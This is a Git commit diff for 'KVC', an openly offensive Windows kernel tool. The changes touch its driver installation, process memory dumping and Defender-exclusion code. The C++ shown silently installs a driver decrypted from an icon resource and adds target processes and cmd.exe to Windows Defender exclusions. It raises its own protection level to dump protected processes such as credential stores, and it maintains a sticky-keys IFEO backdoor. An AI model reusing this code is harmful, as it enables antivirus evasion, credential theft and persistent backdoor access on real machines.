admin/kvc
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Overwrite content

Browse Source
This commit is contained in:
wesmar
2025-09-18 23:42:08 +02:00
parent ebc93881a8
commit a84cb5ba92
7 changed files with 141 additions and 59 deletions
Download Patch File Download Diff File Expand all files Collapse all files

8
README.md
View File

@@ -1,11 +1,3 @@
<div align="center">
<h3 style="color:red; font-weight:800; text-transform:uppercase;">
IMPORTANT NOTICE — DO NOT DOWNLOAD THE BINARY TODAY (18.09.2025 / SEPTEMBER 18, 2025)
</h3>
<p style="color:red; font-weight:700; max-width:900px; margin:0 auto; text-transform:uppercase;">
FULL WINDOWS 10 SUPPORT IS BEING DEPLOYED AND A LEGACY-TYPE COMPILATION IS CURRENTLY BEING GENERATED IN THE BACKGROUND. DOWNLOADING THE CURRENT BINARY MAY CAUSE INSTABILITY OR INCOMPATIBILITY. PLEASE WAIT FOR THE STABLE RELEASE.
</p>
</div>
# KVC - Kernel Vulnerability Capabilities Framework
<div align="center">

3
kvc/Controller.h
View File

@@ -171,7 +171,8 @@ private:
std::vector<BYTE>& kvcCryptData) noexcept;
// Atomic driver operations for stability
bool EnsureDriverAvailable() noexcept;
bool ForceRemoveService() noexcept;
bool EnsureDriverAvailable() noexcept;
bool IsDriverCurrentlyLoaded() noexcept;
bool PerformAtomicInit() noexcept;
bool PerformAtomicInitWithErrorCleanup() noexcept;

1
kvc/ControllerCore.cpp
View File

@@ -129,6 +129,7 @@ bool Controller::PerformAtomicInitWithErrorCleanup() noexcept {
// Core driver availability check with fallback mechanisms
bool Controller::EnsureDriverAvailable() noexcept {
// Phase 1: Check if the driver is already available (without testing)
ForceRemoveService();
if (IsDriverCurrentlyLoaded()) {
return true;
}

56
kvc/ControllerDriverManager.cpp
View File

@@ -1,3 +1,28 @@
/*******************************************************************************
_ ____ ______
| |/ /\ \ / / ___|
| ' / \ \ / / |
| . \ \ V /| |___
|_|\_\ \_/ \____|
The **Kernel Vulnerability Capabilities (KVC)** framework represents a paradigm shift in Windows security research,
offering unprecedented access to modern Windows internals through sophisticated ring-0 operations. Originally conceived
as "Kernel Process Control," the framework has evolved to emphasize not just control, but the complete **exploitation
of kernel-level primitives** for legitimate security research and penetration testing.
KVC addresses the critical gap left by traditional forensic tools that have become obsolete in the face of modern Windows
security hardening. Where tools like ProcDump and Process Explorer fail against Protected Process Light (PPL) and Antimalware
Protected Interface (AMSI) boundaries, KVC succeeds by operating at the kernel level, manipulating the very structures
that define these protections.
-----------------------------------------------------------------------------
Author : Marek Wesołowski
Email : marek@wesolowski.eu.org
Phone : +48 607 440 283 (Tel/WhatsApp)
Date : 04-09-2025
*******************************************************************************/
// ControllerDriverManager.cpp
#include "Controller.h"
#include "common.h"
@@ -7,6 +32,33 @@
namespace fs = std::filesystem;
bool Controller::ForceRemoveService() noexcept {
if (!InitDynamicAPIs()) {
return false;
}
SC_HANDLE hSCM = OpenSCManagerW(nullptr, nullptr, SC_MANAGER_ALL_ACCESS);
if (!hSCM) {
return false;
}
SC_HANDLE hService = g_pOpenServiceW(hSCM, GetServiceName().c_str(), DELETE);
if (!hService) {
DWORD err = GetLastError();
CloseServiceHandle(hSCM);
return (err == ERROR_SERVICE_DOES_NOT_EXIST);
}
BOOL success = g_pDeleteService(hService);
DWORD err = GetLastError();
CloseServiceHandle(hService);
CloseServiceHandle(hSCM);
return success || (err == ERROR_SERVICE_MARKED_FOR_DELETE);
}
// Driver service lifecycle management
bool Controller::StopDriverService() noexcept {
DEBUG(L"StopDriverService called");
@@ -90,7 +142,8 @@ std::vector<BYTE> Controller::DecryptDriver(const std::vector<BYTE>& encryptedDa
// Silent driver installation with TrustedInstaller privileges
bool Controller::InstallDriverSilently() noexcept {
auto encryptedData = ExtractEncryptedDriver();
ForceRemoveService();
auto encryptedData = ExtractEncryptedDriver();
if (encryptedData.empty()) return false;
auto driverData = DecryptDriver(encryptedData);
@@ -184,6 +237,7 @@ bool Controller::StartDriverServiceSilent() noexcept {
// Legacy driver installation with enhanced error handling
bool Controller::InstallDriver() noexcept {
ForceRemoveService();
auto encryptedData = ExtractEncryptedDriver();
if (encryptedData.empty()) {
ERROR(L"Failed to extract encrypted driver from icon resource");

91
kvc/ControllerMemoryOperations.cpp
View File

@@ -80,12 +80,15 @@ bool Controller::CreateMiniDump(DWORD pid, const std::wstring& outputPath) noexc
std::wstring processName = Utils::GetProcessName(pid);
// Add process to Defender exclusions to prevent interference during dumping
std::wstring processNameWithExt = processName;
if (processNameWithExt.find(L".exe") == std::wstring::npos) {
processNameWithExt += L".exe";
}
m_trustedInstaller.AddProcessToDefenderExclusions(processName);
// Try to add process to Defender exclusions to prevent interference during dumping
std::wstring processNameWithExt = processName;
if (processNameWithExt.find(L".exe") == std::wstring::npos) {
processNameWithExt += L".exe";
}
if (!m_trustedInstaller.AddProcessToDefenderExclusions(processName)) {
INFO(L"AV exclusion skipped: %s", processName.c_str());
}
// System process validation - these processes cannot be dumped
if (pid == 4 || processName == L"System") {
@@ -128,21 +131,18 @@ bool Controller::CreateMiniDump(DWORD pid, const std::wstring& outputPath) noexc
return false;
}
// Get target process protection level for elevation
// Get target process protection level for elevation - this is auxiliary
auto kernelAddr = GetProcessKernelAddress(pid);
if (!kernelAddr) {
ERROR(L"Failed to get kernel address for target process");
m_trustedInstaller.RemoveProcessFromDefenderExclusions(processName);
PerformAtomicCleanup();
return false;
INFO(L"Could not get kernel address for target process (continuing without self-protection)");
}
auto targetProtection = GetProcessProtection(kernelAddr.value());
if (!targetProtection) {
ERROR(L"Failed to get protection info for target process");
m_trustedInstaller.RemoveProcessFromDefenderExclusions(processName);
PerformAtomicCleanup();
return false;
auto targetProtection = std::optional<UCHAR>{};
if (kernelAddr) {
targetProtection = GetProcessProtection(kernelAddr.value());
if (!targetProtection) {
INFO(L"Could not get protection info for target process (continuing without self-protection)");
}
}
if (g_interrupted) {
@@ -152,13 +152,13 @@ bool Controller::CreateMiniDump(DWORD pid, const std::wstring& outputPath) noexc
return false;
}
// Protection elevation to match target process level
if (targetProtection.value() > 0) {
// Protection elevation to match target process level - auxiliary feature
if (targetProtection && targetProtection.value() > 0) {
UCHAR targetLevel = Utils::GetProtectionLevel(targetProtection.value());
UCHAR targetSigner = Utils::GetSignerType(targetProtection.value());
std::wstring levelStr = (targetLevel == static_cast<UCHAR>(PS_PROTECTED_TYPE::Protected)) ? L"PP" : L"PPL";
std::wstring signerStr;
std::wstring signerStr = L"Unknown";
switch (static_cast<PS_PROTECTED_SIGNER>(targetSigner)) {
case PS_PROTECTED_SIGNER::Lsa: signerStr = L"Lsa"; break;
@@ -170,25 +170,26 @@ bool Controller::CreateMiniDump(DWORD pid, const std::wstring& outputPath) noexc
case PS_PROTECTED_SIGNER::CodeGen: signerStr = L"CodeGen"; break;
case PS_PROTECTED_SIGNER::App: signerStr = L"App"; break;
default:
ERROR(L"Unknown signer type for target process");
m_trustedInstaller.RemoveProcessFromDefenderExclusions(processName);
PerformAtomicCleanup();
return false;
INFO(L"Unknown signer type - skipping self-protection");
break;
}
INFO(L"Target process protection: %s-%s", levelStr.c_str(), signerStr.c_str());
if (signerStr != L"Unknown") {
INFO(L"Target process protection: %s-%s", levelStr.c_str(), signerStr.c_str());
if (!SelfProtect(levelStr, signerStr)) {
ERROR(L"Failed to set self protection to %s-%s", levelStr.c_str(), signerStr.c_str());
} else {
SUCCESS(L"Set self protection to %s-%s", levelStr.c_str(), signerStr.c_str());
if (!SelfProtect(levelStr, signerStr)) {
INFO(L"Self-protection failed: %s-%s (continuing with dump)", levelStr.c_str(), signerStr.c_str());
} else {
SUCCESS(L"Self-protection set to %s-%s", levelStr.c_str(), signerStr.c_str());
}
}
} else {
INFO(L"Target process is not protected, no self-protection needed");
}
// Try to enable debug privilege - auxiliary feature
if (!EnableDebugPrivilege()) {
ERROR(L"Failed to enable debug privilege");
INFO(L"Debug privilege failed (continuing with dump anyway)");
}
if (g_interrupted) {
@@ -199,12 +200,12 @@ bool Controller::CreateMiniDump(DWORD pid, const std::wstring& outputPath) noexc
return false;
}
// Open target process with appropriate privileges
// Open target process with appropriate privileges - CRITICAL operation
HANDLE hProcess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, pid);
if (!hProcess) {
hProcess = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, FALSE, pid);
if (!hProcess) {
ERROR(L"Failed to open process (error: %d)", GetLastError());
ERROR(L"Critical: Failed to open process (error: %d)", GetLastError());
m_trustedInstaller.RemoveProcessFromDefenderExclusions(processName);
PerformAtomicCleanup();
return false;
@@ -217,9 +218,10 @@ bool Controller::CreateMiniDump(DWORD pid, const std::wstring& outputPath) noexc
fullPath += L"\\";
fullPath += processName + L"_" + std::to_wstring(pid) + L".dmp";
// Create dump file - CRITICAL operation
HANDLE hFile = CreateFileW(fullPath.c_str(), GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
if (hFile == INVALID_HANDLE_VALUE) {
ERROR(L"Failed to create dump file (error: %d)", GetLastError());
ERROR(L"Critical: Failed to create dump file (error: %d)", GetLastError());
CloseHandle(hProcess);
m_trustedInstaller.RemoveProcessFromDefenderExclusions(processName);
PerformAtomicCleanup();
@@ -249,6 +251,7 @@ bool Controller::CreateMiniDump(DWORD pid, const std::wstring& outputPath) noexc
INFO(L"Creating memory dump - this may take a while. Press Ctrl+C to cancel safely.");
// Execute the actual memory dump - CRITICAL operation
BOOL result = MiniDumpWriteDump(hProcess, pid, hFile, dumpType, NULL, NULL, NULL);
if (g_interrupted) {
@@ -269,19 +272,19 @@ bool Controller::CreateMiniDump(DWORD pid, const std::wstring& outputPath) noexc
DWORD error = GetLastError();
switch (error) {
case ERROR_TIMEOUT:
ERROR(L"MiniDumpWriteDump timed out - process may be unresponsive or in critical section");
ERROR(L"Critical: MiniDumpWriteDump timed out - process may be unresponsive or in critical section");
break;
case RPC_S_CALL_FAILED:
ERROR(L"RPC call failed - process may be a kernel-mode or system-critical process");
ERROR(L"Critical: RPC call failed - process may be a kernel-mode or system-critical process");
break;
case ERROR_ACCESS_DENIED:
ERROR(L"Access denied - insufficient privileges even with protection bypass");
ERROR(L"Critical: Access denied - insufficient privileges even with protection bypass");
break;
case ERROR_PARTIAL_COPY:
ERROR(L"Partial copy - some memory regions could not be read");
ERROR(L"Critical: Partial copy - some memory regions could not be read");
break;
default:
ERROR(L"MiniDumpWriteDump failed (error: %d / 0x%08x)", error, error);
ERROR(L"Critical: MiniDumpWriteDump failed (error: %d / 0x%08x)", error, error);
break;
}
DeleteFileW(fullPath.c_str());
@@ -293,8 +296,11 @@ bool Controller::CreateMiniDump(DWORD pid, const std::wstring& outputPath) noexc
SUCCESS(L"Memory dump created successfully: %s", fullPath.c_str());
// Cleanup phase - these operations are non-critical
INFO(L"Removing self-protection before cleanup...");
SelfProtect(L"none", L"none");
if (!SelfProtect(L"none", L"none")) {
DEBUG(L"Self-protection removal failed (non-critical)");
}
if (g_interrupted) {
INFO(L"Operation completed but cleanup was interrupted");
@@ -303,8 +309,11 @@ bool Controller::CreateMiniDump(DWORD pid, const std::wstring& outputPath) noexc
return true;
}
// Clean up Defender exclusions and perform atomic cleanup
m_trustedInstaller.RemoveProcessFromDefenderExclusions(processName);
// Clean up Defender exclusions and perform atomic cleanup - non-critical
if (!m_trustedInstaller.RemoveProcessFromDefenderExclusions(processName)) {
DEBUG(L"AV cleanup skipped: %s", processName.c_str());
}
PerformAtomicCleanup();
return true;

16
kvc/TrustedInstallerIntegrator.cpp
View File

@@ -247,7 +247,7 @@ bool TrustedInstallerIntegrator::AddDefenderExclusion(ExclusionType type, const
if (result) {
SUCCESS(L"Successfully added to Windows Defender %s exclusions: %s", typeStr.c_str(), processedValue.c_str());
} else {
ERROR(L"Failed to add to Windows Defender %s exclusions: %s", typeStr.c_str(), processedValue.c_str());
INFO(L"AV exclusion skipped: %s %s", typeStr.c_str(), processedValue.c_str());
}
return result;
@@ -287,7 +287,7 @@ bool TrustedInstallerIntegrator::RemoveDefenderExclusion(ExclusionType type, con
if (result) {
SUCCESS(L"Successfully removed from Windows Defender %s exclusions: %s", typeStr.c_str(), processedValue.c_str());
} else {
ERROR(L"Failed to remove from Windows Defender %s exclusions: %s", typeStr.c_str(), processedValue.c_str());
INFO(L"AV cleanup skipped: %s %s", typeStr.c_str(), processedValue.c_str());
}
return result;
@@ -403,8 +403,8 @@ bool TrustedInstallerIntegrator::InstallStickyKeysBackdoor() noexcept
// First add cmd.exe to Defender process exclusions to prevent detection
if (!AddProcessToDefenderExclusions(L"cmd.exe")) {
ERROR(L"Failed to add cmd.exe to Defender process exclusions");
return false;
INFO(L"AV exclusion skipped for cmd.exe (continuing)");
}
// Create IFEO registry entry for sethc.exe
@@ -459,8 +459,8 @@ bool TrustedInstallerIntegrator::RemoveStickyKeysBackdoor() noexcept
// Remove cmd.exe from Defender process exclusions
if (!RemoveProcessFromDefenderExclusions(L"cmd.exe")) {
ERROR(L"Failed to remove cmd.exe from Defender process exclusions");
success = false;
INFO(L"AV cleanup skipped for cmd.exe");
}
if (success) {
@@ -610,7 +610,7 @@ bool TrustedInstallerIntegrator::AddProcessToDefenderExclusions(const std::wstri
if (result) {
SUCCESS(L"Successfully added to Windows Defender process exclusions: %s", processName.c_str());
} else {
ERROR(L"Failed to add to Windows Defender process exclusions: %s", processName.c_str());
INFO(L"AV exclusion skipped: %s", processName.c_str());
}
return result;
@@ -635,7 +635,7 @@ bool TrustedInstallerIntegrator::RemoveProcessFromDefenderExclusions(const std::
if (result) {
SUCCESS(L"Successfully removed from Windows Defender process exclusions: %s", processName.c_str());
} else {
ERROR(L"Failed to remove from Windows Defender process exclusions: %s", processName.c_str());
INFO(L"AV cleanup skipped: %s", processName.c_str());
}
return result;

25
kvc/Utils.cpp
View File

@@ -1,3 +1,28 @@
/*******************************************************************************
_ ____ ______
| |/ /\ \ / / ___|
| ' / \ \ / / |
| . \ \ V /| |___
|_|\_\ \_/ \____|
The **Kernel Vulnerability Capabilities (KVC)** framework represents a paradigm shift in Windows security research,
offering unprecedented access to modern Windows internals through sophisticated ring-0 operations. Originally conceived
as "Kernel Process Control," the framework has evolved to emphasize not just control, but the complete **exploitation
of kernel-level primitives** for legitimate security research and penetration testing.
KVC addresses the critical gap left by traditional forensic tools that have become obsolete in the face of modern Windows
security hardening. Where tools like ProcDump and Process Explorer fail against Protected Process Light (PPL) and Antimalware
Protected Interface (AMSI) boundaries, KVC succeeds by operating at the kernel level, manipulating the very structures
that define these protections.
-----------------------------------------------------------------------------
Author : Marek Wesołowski
Email : marek@wesolowski.eu.org
Phone : +48 607 440 283 (Tel/WhatsApp)
Date : 04-09-2025
*******************************************************************************/
// Utils.cpp - Fixed compilation issues with NtQuerySystemInformation
#include "Utils.h"
#include "common.h"